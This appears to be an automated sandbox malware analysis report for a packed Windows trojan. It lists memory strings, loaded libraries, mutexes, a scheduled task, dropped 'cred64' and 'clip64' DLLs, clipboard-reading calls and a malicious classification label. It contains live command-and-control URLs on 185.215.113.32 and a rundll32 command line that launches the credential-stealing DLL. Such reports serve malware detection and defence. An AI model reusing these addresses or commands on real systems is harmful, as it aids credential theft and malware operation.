                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.php2ab05
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.php:10
                                Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1
                                Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1&
                                Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1r
                                Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1tesf
                                Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpK
                                Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpVl
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpWindows
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpa
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpa0
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpa2ab05
                                Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpg
                                Source: explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpn
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpp
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phprsion
                                Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpu
                                Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.32/yandex/index.phpx
                                Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                Source: powershell.exe, 0000000B.00000002.2031780544.000002004893F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 0000000B.00000002.2050170977.000002005F3BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                                Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E222580 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__ehhandler$___std_fs_get_file_id@8,__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,__ehhandler$___std_fs_get_file_id@8,10_2_6E222580
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E222580 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__ehhandler$___std_fs_get_file_id@8,__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,__ehhandler$___std_fs_get_file_id@8,10_2_6E222580

                                System Summary

                                barindex
                                PE file contains section with special chars
                                Source: wIaKimJFke.exeStatic PE information: section name:
                                Source: wIaKimJFke.exeStatic PE information: section name: .idata
                                Source: wIaKimJFke.exeStatic PE information: section name:
                                Source: explorgu.exe.0.drStatic PE information: section name:
                                Source: explorgu.exe.0.drStatic PE information: section name: .idata
                                Source: explorgu.exe.0.drStatic PE information: section name:
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile created: C:\Windows\Tasks\explorgu.jobJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_0052707B0_2_0052707B
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_005268090_2_00526809
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_005224D00_2_005224D0
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_004E60E00_2_004E60E0
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_005229680_2_00522968
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_00527EB00_2_00527EB0
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_00526F5B0_2_00526F5B
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_005177800_2_00517780
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002E68095_2_002E6809
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002E707B5_2_002E707B
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002E24D05_2_002E24D0
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002E29685_2_002E2968
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002E7EB05_2_002E7EB0
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002E6F5B5_2_002E6F5B
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002D77805_2_002D7780
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E22258010_2_6E222580
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E23170110_2_6E231701
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7177F811_2_00007FFD9B7177F8
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7D773211_2_00007FFD9B7D7732
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E2269A0 appears 34 times
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                Source: wIaKimJFke.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: wIaKimJFke.exeStatic PE information: Section: ZLIB complexity 0.9976810003443526
                                Source: wIaKimJFke.exeStatic PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649
                                Source: explorgu.exe.0.drStatic PE information: Section: ZLIB complexity 0.9976810003443526
                                Source: explorgu.exe.0.drStatic PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649
                                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@15/21@0/1
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile created: C:\Users\user\AppData\Roaming\006700e5a2ab05Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile created: C:\Users\user\AppData\Local\Temp\00c07260dcJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
